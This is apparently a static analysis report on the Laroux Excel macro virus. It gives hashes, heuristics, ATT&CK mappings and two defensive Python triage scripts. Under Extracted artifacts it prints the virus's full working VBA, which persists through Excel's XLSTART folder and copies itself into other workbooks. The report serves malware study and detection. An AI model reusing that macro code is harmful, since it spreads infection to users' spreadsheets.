Xls.Trojan.Laroux-21 — Office (OLE) malware analysis

Static analysis result for SHA-256 4cc2a2518692fb34…

MALICIOUS

Office (OLE)

Size: 44.5 KB
Created: 1999-02-08 09:24:15
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: aae4b70628f9471ba97067bec3d66cdb
SHA-1: bc8f67fd6293d4eb20d04f26415703449b5dc4f4
SHA-256: 4cc2a2518692fb34f5fa69aca1b48ef9ad529f858133d4d2c5d367f467b669b3
Risk score: 300

Malware Insights

Xls.Trojan.Laroux-21 · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

ClamAV identifies the file as Xls.Trojan.Laroux-21, a member of the Laroux family of Excel macro viruses. The decoded VBA (module `jokefile`, listed under Extracted artifacts) has an `auto_open` procedure that runs when the workbook is opened, subject to the macro security setting. `auto_open` carries no payload of its own: it sets `Application.OnSheetActivate = "joke"`, so the `joke` procedure fires on every subsequent sheet activation. `joke` tests two conditions, whether `jokefile.xls` already exists in `Application.StartupPath` (Excel's XLSTART folder) and whether the active workbook carries a module (an Excel 5/95-style module sheet), and combines them into `whichfile = p + w * 10`. With a module present but no startup copy (`Case 10`) it saves the active workbook into XLSTART as `jokefile.xls`; with a startup copy present but a clean active workbook (`Case 1`) it copies the `jokefile` sheet from `jokefile.xls` into the active workbook, infecting it. Both branches then re-arm `OnSheetActivate` to point at the copy in XLSTART (`jokefile!joke` / `jokefile.xls!joke`). Because Excel loads everything in XLSTART at start-up, the virus survives reboots and reaches every workbook the user activates. For mapping purposes, XLSTART is an Office application startup location rather than a Registry Run key or the Windows Startup folder, so ATT&CK T1137 (Office Application Startup) describes this behaviour more precisely than T1547.001; the tool's mapping is kept above as reported.
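To make the reasoning above mechanical, the following Python is an added example written for this page (not code from the analysis tool, from ClamAV or from oletools). It runs pattern checks over decoded VBA text for the three things that make this sample a self-replicating macro: an auto-exec entry point, a re-armed application event hook, and a SaveAs into Excel's startup path or a sheet copy into another workbook. The input is a constructed excerpt of this sample's `jokefile` module; the list of hooked events, the regular expressions and the verdict rule are my own choices, not the tool's heuristics.

```python
import re

# Constructed excerpt of the decoded VBA from this sample's "jokefile" module, reduced to the
# lines that drive the verdict (copied from the report's artifact preview; not the full macro).
SAMPLE_VBA = r'''
Sub auto_open()
Application.OnSheetActivate = "joke"
End Sub

Sub joke()
C$ = Application.StartupPath
m$ = Dir(C$ & "\" & "jokefile.xls")
If m$ = "jokefile.xls" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
Select Case p + w * 10
    Case 10
    Workbooks(ActiveWorkbook.Name).SaveAs filename:=Application.StartupPath & "\" & "jokefile.xls", FileFormat:=xlNormal
    Application.OnSheetActivate = ""
    Application.OnSheetActivate = "jokefile!joke"
    Case 1
    Workbooks("jokefile.xls").Sheets("jokefile").Copy before:=Workbooks(ActiveWorkbook.Name).Sheets(1)
    Application.OnSheetActivate = ""
    Application.OnSheetActivate = "jokefile.xls!joke"
End Select
End Sub
'''

# Procedures Excel/Word run without a click; Laroux-era samples use auto_open.
AUTOEXEC = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?Sub\s+(auto_open|auto_close|autoopen|autoexec|workbook_open|document_open)\b",
    re.I | re.M)
# Legacy Excel 5/95 application-level events a macro can point at one of its own procedures (my list).
EVENT_HOOK = re.compile(
    r"Application\.(OnSheetActivate|OnSheetDeactivate|OnTime|OnKey|OnCalculate|OnWindow|OnEntry|OnData)"
    r'\s*=\s*"([^"]*)"', re.I)
SAVEAS = re.compile(r"\.SaveAs\b.*", re.I)
STARTUP_DIR = re.compile(r"Application\.(?:StartupPath|AltStartupPath)|XLSTART", re.I)
SHEET_COPY = re.compile(r'Sheets\("([^"]+)"\)\.Copy\b', re.I)


def triage(vba: str) -> dict:
    """Score decoded VBA for the auto-exec + event-hook + startup-folder pattern."""
    autoexec = sorted({m.group(1).lower() for m in AUTOEXEC.finditer(vba)})
    hooks = sorted({m.group(2) for m in EVENT_HOOK.finditer(vba) if m.group(2)})  # "" just clears the hook
    saveas_to_startup = any(STARTUP_DIR.search(line) for line in SAVEAS.findall(vba))
    sheet_copy = sorted(set(SHEET_COPY.findall(vba)))
    findings = []
    if autoexec:
        findings.append("auto-exec entry point: " + ", ".join(autoexec))
    if hooks:
        findings.append("re-arms application event hook -> " + ", ".join(hooks))
    if saveas_to_startup:
        findings.append("SaveAs into Application.StartupPath (XLSTART persistence)")
    if sheet_copy:
        findings.append("copies own sheet into other workbooks: " + ", ".join(sheet_copy))
    # Verdict rule (my assumption): entry point + hook + a way to spread = self-replicating macro.
    replicates = bool(autoexec) and bool(hooks) and (saveas_to_startup or bool(sheet_copy))
    return {
        "autoexec": autoexec,
        "event_hooks": hooks,
        "saveas_to_startup": saveas_to_startup,
        "sheet_copy": sheet_copy,
        "findings": findings,
        "verdict": "self-replicating macro (persists via Excel startup path)" if replicates else "review manually",
    }


if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    for line in result["findings"]:
        print("-", line)
    print(result["verdict"])
```

On a real file the text to feed `triage` is what `oletools.olevba.VBA_Parser(path).extract_macros()` yields per module (the same extractor that produced macros.bas below); the checks are deliberately literal, so a macro that builds `"OnSheet" & "Activate"` at runtime would slip past them and needs the dynamic view.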

Heuristics (6)

  • ClamAV: Xls.Trojan.Laroux-21 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Trojan.Laroux-21.
  • Embedded Office document has suspicious static findings (critical, EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE)
    Generic rule text: a CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics; the rule exists to catch wrapped exploit documents whose top-level type routes them to a PE, archive, or generic scanner instead of the Office path. For this sample the container is itself an OLE workbook, and the child (embedded_office_off00006746.ole, below) is a CFB signature carved at 0x6746, which is not a 512-byte sector boundary, with no readable streams. The "suspicious findings" it inherits are the OLE_SLACK_ANOMALY and OLE_PARSE_EMPTY_STREAMS entries below, which is more consistent with a stray signature or a mis-sized embedded object than with a second document; the verdict does not depend on it.
  • OLE document has large unaccounted-for region (high, OLE_SLACK_ANOMALY)
    The carved OLE object is 19,130 bytes but its declared streams total 0 bytes, so all 19,130 bytes (100%) lie in unallocated sector slack. Generic rule text: this is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure). Caveat: here the rule fired on a child object whose directory could not be parsed at all, so "100% slack" means "nothing was parseable" rather than "a payload sits beside the streams", and no decoded payload from that region is reported. Treat it as a parsing anomaly to confirm by hand, not as established shellcode.
  • VBA macros detected (medium, OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code.
  • Auto_Open macro (high, OLE_VBA_AUTO)
    An auto_open procedure runs without user interaction when the workbook opens (subject to the macro security setting); in this sample it installs the OnSheetActivate hook that drives the infection routine.
  • CFB header with no readable streams (medium, OLE_PARSE_EMPTY_STREAMS)
    The carved object begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous: it is seen with truncated or corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object. The unaligned carve offset noted above is the first thing to rule out.
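The two structural findings above (OLE_SLACK_ANOMALY and OLE_PARSE_EMPTY_STREAMS) reduce to a small amount of compound-file accounting. The following Python is an added example written for this page, not the analysis tool's code: it parses the CFB header, FAT and directory defensively, sums declared stream sizes, counts sectors the FAT actually allocates inside the file, and reports what is left over. The three inputs are constructed in the block (a minimal valid file with one stream, the same file with trailing junk, and a bare header followed by opaque bytes, mirroring the 19,130-byte carved object); the 25% slack threshold is an assumption of mine, and only header-resident DIFAT entries are read, which covers files up to roughly 7 MB.

```python
import struct

SECTOR = 512
MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
MAXREGSECT, DIFSECT, FATSECT, ENDOFCHAIN, FREESECT = 0xFFFFFFFA, 0xFFFFFFFC, 0xFFFFFFFD, 0xFFFFFFFE, 0xFFFFFFFF
NOSTREAM = 0xFFFFFFFF
SLACK_RATIO = 0.25   # assumption: flag when over a quarter of the file lies outside allocated sectors


def parse_cfb(data: bytes) -> dict:
    """Read header, FAT (header DIFAT entries only) and directory chain without trusting any of them."""
    if len(data) < SECTOR or data[:8] != MAGIC:
        raise ValueError("no CFB/OLE2 header")
    sector_shift, = struct.unpack_from("<H", data, 0x1E)
    sec = 1 << sector_shift
    if sec not in (512, 4096):
        raise ValueError("bad sector shift")
    n_fat, first_dir = struct.unpack_from("<II", data, 0x2C)
    difat = struct.unpack_from("<109I", data, 0x4C)
    n_body = (len(data) - sec) // sec            # sectors physically present after the header

    fat = []
    for s in difat[:n_fat]:
        if s >= n_body:                          # FAT sector announced but absent: truncated or bogus
            break
        fat.extend(struct.unpack_from(f"<{sec // 4}I", data, sec * (s + 1)))

    entries, s, seen = [], first_dir, set()
    while s < n_body and s not in seen:          # bounds check plus loop guard on the chain
        seen.add(s)
        base = sec * (s + 1)
        for off in range(base, base + sec, 128):
            e = data[off:off + 128]
            name_len, typ = struct.unpack_from("<HB", e, 0x40)
            if typ not in (1, 2, 5) or not 2 <= name_len <= 64:
                continue                         # unused entry or garbage bytes
            name = e[:name_len - 2].decode("utf-16-le", "replace")
            start, size = struct.unpack_from("<IQ", e, 0x74)
            entries.append((name, typ, start, size))
        s = fat[s] if s < len(fat) else ENDOFCHAIN

    # A sector counts as allocated only if its FAT entry is a chain marker or points inside the file.
    used = sum(1 for v in fat[:n_body] if v < n_body or v in (ENDOFCHAIN, FATSECT, DIFSECT))
    return {"sec": sec, "entries": entries, "used_sectors": used}


def assess(data: bytes) -> dict:
    """Reproduce the two structural heuristics on one CFB body."""
    p = parse_cfb(data)
    streams = [(name, size) for name, typ, _, size in p["entries"] if typ == 2]
    declared = sum(size for _, size in streams)
    allocated = p["sec"] * (1 + p["used_sectors"])       # header plus every allocated sector
    unaccounted = max(len(data) - allocated, 0)
    findings = []
    if not streams:
        findings.append("OLE_PARSE_EMPTY_STREAMS")
    if unaccounted / len(data) > SLACK_RATIO:
        findings.append("OLE_SLACK_ANOMALY")
    return {"file_size": len(data), "streams": streams, "declared_stream_bytes": declared,
            "unaccounted_bytes": unaccounted, "findings": findings}


def build_header(n_fat: int = 1, first_dir: int = 1) -> bytes:
    """Constructed v3 header: 512-byte sectors, FAT in sector 0, directory in sector 1, no mini FAT."""
    h = bytearray(SECTOR)
    h[:8] = MAGIC
    struct.pack_into("<HHHHH", h, 0x18, 0x3E, 3, 0xFFFE, 9, 6)   # minor, major, byte order, sector shift, mini shift
    struct.pack_into("<II", h, 0x2C, n_fat, first_dir)
    struct.pack_into("<I", h, 0x38, 4096)                        # mini stream cutoff
    struct.pack_into("<II", h, 0x3C, ENDOFCHAIN, 0)              # no mini FAT
    struct.pack_into("<II", h, 0x44, ENDOFCHAIN, 0)              # no extra DIFAT sectors
    struct.pack_into("<109I", h, 0x4C, 0, *([FREESECT] * 108))   # DIFAT[0] -> FAT lives in sector 0
    return bytes(h)


def dir_entry(name: str, typ: int, start: int, size: int, child: int = NOSTREAM) -> bytes:
    e = bytearray(128)
    raw = name.encode("utf-16-le") + b"\x00\x00"
    e[:len(raw)] = raw
    struct.pack_into("<HBB", e, 0x40, len(raw), typ, 1)          # name length, object type, colour
    struct.pack_into("<III", e, 0x44, NOSTREAM, NOSTREAM, child)  # left, right, child
    struct.pack_into("<IQ", e, 0x74, start, size)
    return bytes(e)


def build_sample(stream_size: int = 5000, trailing: bytes = b"") -> bytes:
    """Constructed workbook-like CFB: one 'Workbook' stream from sector 2, optional trailing junk."""
    n_data = -(-stream_size // SECTOR)
    fat = [FATSECT, ENDOFCHAIN] + list(range(3, 3 + n_data))    # sector 2 -> 3 -> ... -> end of chain
    fat[-1] = ENDOFCHAIN
    fat += [FREESECT] * (SECTOR // 4 - len(fat))
    directory = (dir_entry("Root Entry", 5, ENDOFCHAIN, 0, child=1)
                 + dir_entry("Workbook", 2, 2, stream_size) + bytes(256))
    body = (b"B" * stream_size).ljust(n_data * SECTOR, b"\x00")
    return build_header() + struct.pack(f"<{SECTOR // 4}I", *fat) + directory + body + trailing


if __name__ == "__main__":
    for label, blob in [("clean", build_sample()),
                        ("trailing junk", build_sample(trailing=b"\x90" * 3000)),
                        ("stray header + 19130 opaque bytes", build_header() + b"\x90" * 19130)]:
        print(label, assess(blob))
```

The third case is the shape of this report's carved child: a valid signature, a body the FAT does not account for, and no directory entry that parses, so both findings fire together. That co-occurrence is exactly why the slack finding on its own should not be read as "payload present"; the next step is to look at the bytes at the carve offset rather than to trust either rule.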

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3196 bytes
SHA-256: 845bb9d88b030998270ce8f23e169c3462bdc6a3ae48ef767c16e18d69b7c2f2
Detection: ClamAV: Xls.Trojan.Laroux-21
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "jokefile"

Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnSheetActivate = "joke"
End Sub

Sub joke()
Attribute joke.VB_ProcData.VB_Invoke_Func = " \n14"
C$ = Application.StartupPath
m$ = Dir(C$ & "\" & "jokefile.xls")
If m$ = "jokefile.xls" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10

Select Case whichfile
    Case 10
    n4$ = ActiveWorkbook.Name
   ' Sheets("jokefile").Visible = True
    Sheets("jokefile").Select
    
    newname$ = ActiveWorkbook.Name
    c4$ = CurDir()
    ChDir Application.StartupPath
    'ActiveWindow.Visible = False
    Workbooks(newname$).SaveAs filename:=Application.StartupPath & "\" & "jokefile.xls", FileFormat:=xlNormal
    ChDir c4$
    Application.OnSheetActivate = ""
    Application.OnSheetActivate = "jokefile!joke"
      
   Case 1
     
   'application.

    n4$ = ActiveWorkbook.Name
    
    p4$ = ActiveWorkbook.Path
    s$ = Workbooks(n4$).Sheets(1).Name
    If s$ <> "jokefile" Then
        Workbooks("jokefile.xls").Sheets("jokefile").Copy before:=Workbooks(n4$).Sheets(1)
    Else
    End If
    
    Application.OnSheetActivate = ""
    Application.OnSheetActivate = "jokefile.xls!joke"
    Case Else
    End Select
        
End Sub


Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Filename: embedded_office_off00006746.ole
Kind: embedded-office
Source: Embedded OLE/CFB Office body inside ole container at offset 0x6746
Size: 19130 bytes
SHA-256: 60772d850187a91ea816d6910df03c9f226b1b3dbd71d29bdd1ba065da1e3310
Note: this object was carved from a CFB signature at 0x6746, which is not a multiple of the 512-byte sector size, and it yields no readable streams; see the OLE_PARSE_EMPTY_STREAMS and OLE_SLACK_ANOMALY findings under Heuristics before treating it as a separate document.